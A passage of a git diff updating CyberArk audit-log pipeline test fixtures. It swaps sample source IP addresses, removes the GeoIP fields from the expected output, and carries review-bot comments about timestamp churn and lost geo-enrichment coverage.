Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:22:44\",\"IsoTimestamp\":\"2021-03-15T10:22:44Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"22\",\"Desc\":\"CPM Verify Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Verify Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "22", "kind": "event", "action": "cpm verify password", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log index 51629665b2b..b4953ee2439 100644 
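Review bot: The `- "ingested": "2021-06-09T10:24:29.336778300Z"` / `+ "ingested": "2021-12-09T13:36:41.072873500Z"` pair in this `@@ -195,8 +186,8 @@` hunk is regeneration noise rather than part of the address fix, and the same churn is the entire content of the `@@ -70`, `@@ -174`, `@@ -278` and `@@ -383` hunks of test-24-cpm-change-password.log-expected.json and of the `@@ -59`, `@@ -115` and `@@ -180` hunks of test-23-action-on-closed-safe.log-expected.json. `event.ingested` is stamped with wall-clock time by the pipeline, so every regeneration rewrites it and the one meaningful change per fixture (the `original` line here) is buried among timestamp diffs. If the pipeline-test harness in use supports declaring dynamic fields per test case, listing `event.ingested` there would keep these lines stable across regenerations; otherwise a sentence in the PR description saying the `ingested` lines are regeneration noise would help reviewers.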
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log 
@@ -1,3 +1,3 @@ -<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} <7>1 2021-03-14T12:07:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:27\n 2021-03-14T12:07:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n PasswordManager\n Action On Closed Safe\n \n \n AccountsFeedADAccounts\n \n 10.0.1.20\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:27","IsoTimestamp":"2021-03-14T12:07:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"PasswordManager","Action":"Action On Closed 
Safe","SourceUser":"","TargetUser":"","Safe":"AccountsFeedADAccounts","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} -<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 34.71.250.247\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} +<7>1 2021-03-14T12:57:16Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:16\n 2021-03-14T12:57:16Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 23\n Action On Closed Safe\n Error\n Administrator\n Action On Closed Safe\n \n \n PSMPConf\n \n 67.43.156.15\n \n \n \n \n \n Action On Closed Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:16","IsoTimestamp":"2021-03-14T12:57:16Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"23","Desc":"Action On Closed Safe","Severity":"Error","Issuer":"Administrator","Action":"Action On Closed Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Action On Closed Safe","GatewayStation":""}}} 
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json index 452d8fa29d0..015a865644a 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-23-action-on-closed-safe.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Action On Closed Safe", "message": "Action On Closed Safe", "issuer": "Administrator", 
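Review bot: The `@@ -7,20 +7,8 @@` hunk removes the whole `source.geo` object for the new address `67.43.156.13` instead of replacing it with the lookup result for the new value, and the `@@ -130,17 +118,8 @@` hunk further down does the same for `67.43.156.15`, so this expected file no longer exercises GeoIP enrichment of `source.ip` at all. If the 67.43.156.0/24 range is covered by the GeoIP fixture the test harness ships, the regenerated expectation was probably produced without that fixture loaded and the test will fail on a correctly provisioned run; if the range is not covered, the commit silently drops coverage of the geoip step for this data stream, and a regression there would go unnoticed. Worth confirming which case applies before merging, or picking a test address the fixture is known to resolve.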
@@ -59,8 +47,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:29.424500300Z", - "original": "\u003c7\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:41.393352600Z", + "original": "\u003c7\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", 
@@ -115,7 +103,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:29.424518Z", + "ingested": "2021-12-09T13:36:41.393360900Z", "original": "\u003c7\u003e1 2021-03-14T12:07:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:07:27\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:07:27Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eAccountsFeedADAccounts\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:07:27\",\"IsoTimestamp\":\"2021-03-14T12:07:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"Action On Closed 
Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"AccountsFeedADAccounts\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", @@ -130,17 +118,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -157,7 +136,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -166,8 +145,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:16Z", "safe": "PSMPConf", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e23\u003c/MessageID\u003e\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e23\u003c/MessageID\u003e\n \u003cDesc\u003eAction On 
Closed Safe\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Action On Closed Safe", "message": "Action On Closed Safe", "issuer": "Administrator", 
@@ -180,8 +159,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:29.424522900Z", - "original": "\u003c7\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed 
Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:41.393365600Z", + "original": "\u003c7\u003e1 2021-03-14T12:57:16Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:16\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:16Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e23\u003c/MessageID\u003e\\n \u003cDesc\u003eAction On Closed Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eAction On Closed Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPConf\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAction On Closed Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:16\",\"IsoTimestamp\":\"2021-03-14T12:57:16Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"23\",\"Desc\":\"Action On Closed Safe\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"Action On Closed Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Action On Closed Safe\",\"GatewayStation\":\"\"}}}", "code": "23", "kind": "event", "action": "action on closed safe", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json index 36ac10d015d..ce8b170d2df 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-24-cpm-change-password.log-expected.json 
@@ -70,7 +70,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491218300Z", + "ingested": "2021-12-09T13:36:41.659740900Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e24\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Change Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Change Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\u003c/File\u003e\\n \u003cStation\u003e10.2.0.4\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=radiussrv.cyberark.local;username=test12;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Change Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"test12\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"LastSuccessVerification\\\" Value=\\\"1604943844\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ChangeTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1604944158\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-test12\",\"Station\":\"10.2.0.4\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=radiussrv.cyberark.local;username=test12;\",\"Message\":\"CPM Change Password\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"test12\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1604943844\"},{\"Name\":\"LastTask\",\"Value\":\"ChangeTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1604944158\"}]}}}}", "code": "24", "kind": "event", 
@@ -174,7 +174,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:29.491235800Z", + "ingested": "2021-12-09T13:36:41.659748100Z", "original": "\u003c5\u003e1 2021-03-08T19:20:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 11:20:05\",\"IsoTimestamp\":\"2021-03-08T19:20:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"24\",\"Desc\":\"CPM Change Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Change Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask\",\"ExtraDetails\":\"address=components;username=x_accountA;\",\"Message\":\"CPM Change 